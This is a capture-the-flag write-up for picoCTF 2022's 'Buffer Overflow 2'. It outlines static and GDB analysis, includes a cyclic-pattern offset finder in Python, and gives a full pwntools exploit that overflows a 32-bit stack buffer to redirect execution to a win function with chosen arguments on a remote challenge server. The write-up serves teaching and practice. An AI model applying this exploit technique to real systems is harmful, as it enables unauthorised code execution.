Buffer Overflow 2 : picoCTF 2022

Introduction

  1. static code analysis (going through the source code manually)
  2. dynamic analysis (using GDB with the gef extension and examining memory addresses while the program is running)
  1. main function
  2. vuln function
  3. win function
     1. It opens the flag file and reads it
     2. Then it checks the two arguments; if they match the values declared in the binary, the program prints the flag
pattern offset 0x62616164
info functions
disassemble win
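To show where the 112 in the payload comes from, here is an added example (not from the original write-up) that reimplements the cyclic pattern gef's `pattern create` / `pattern offset` generate and search, so the value 0x62616164 read out of EIP after the crash maps back to the distance between the start of the buffer and the saved return address; the function names are my own.

```python
import itertools

ALPHABET = b"abcdefghijklmnopqrstuvwxyz"


def de_bruijn(alphabet=ALPHABET, n=4):
    """Yield the de Bruijn sequence B(k, n) one byte at a time: every
    n-byte window over the alphabet occurs exactly once, so a window read
    back from a register identifies its position in the input uniquely.
    Standard Lyndon-word (FKM) construction, the same scheme gef's
    'pattern create' and pwntools' cyclic() use."""
    k = len(alphabet)
    a = [0] * (k * n)

    def step(t, p):
        if t > n:
            if n % p == 0:
                for j in range(1, p + 1):
                    yield alphabet[a[j]]
        else:
            a[t] = a[t - p]
            yield from step(t + 1, p)
            for j in range(a[t - p] + 1, k):
                a[t] = j
                yield from step(t + 1, t)

    yield from step(1, 1)


def cyclic(length, n=4):
    """First `length` bytes of the pattern (what gets fed to the program)."""
    return bytes(itertools.islice(de_bruijn(n=n), length))


def cyclic_find(value, n=4, max_len=4096):
    """Offset of `value` inside the pattern. `value` is the crashed register
    as an int (0x62616164 from EIP) or as raw bytes. A 32-bit register on
    i386 holds its bytes little-endian, so 0x62616164 is b"daab": the four
    pattern bytes that landed on the saved return address."""
    if isinstance(value, int):
        value = value.to_bytes(n, "little")
    return cyclic(max_len, n).find(value)


if __name__ == "__main__":
    # 112: the buffer plus saved frame data occupy 112 bytes before the
    # return address, hence b"A" * 112 of padding in the payload.
    print(cyclic_find(0x62616164))
```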
#!/usr/bin/env python3
from pwn import *
import sys

if len(sys.argv) != 2:
    print("[~] Usage: python3 exploit.py <HOST>")
    sys.exit(1)

host = sys.argv[1]
port = 56164

context(terminal = ['tmux', 'new-window'])
#make sure you put the correct binary name and path below
binary = context.binary = ELF("./vuln")
#connect = gdb.debug("./vuln", "b main")
context(os = "linux", arch = "i386")
connect = remote(host, port)

log.info("[+] Starting buffer Overflow")
connect.recvuntil(b"Please enter your string:")

log.info("[+] Crafting payload")
payload = b"A" * 112           # padding up to the saved return address (offset from pattern offset)
payload += p32(0x08049296)     # address to return into (win, see disassemble win)
payload += b"A" * 4            # return address win would use when it finishes (never reached)
payload += p32(0xCAFEF00D)     # first argument win checks
payload += p32(0xF00DF00D)     # second argument win checks

log.info("[+] Sending Payload to the remote server")
connect.sendline(payload)
connect.recv()
connect.interactive()
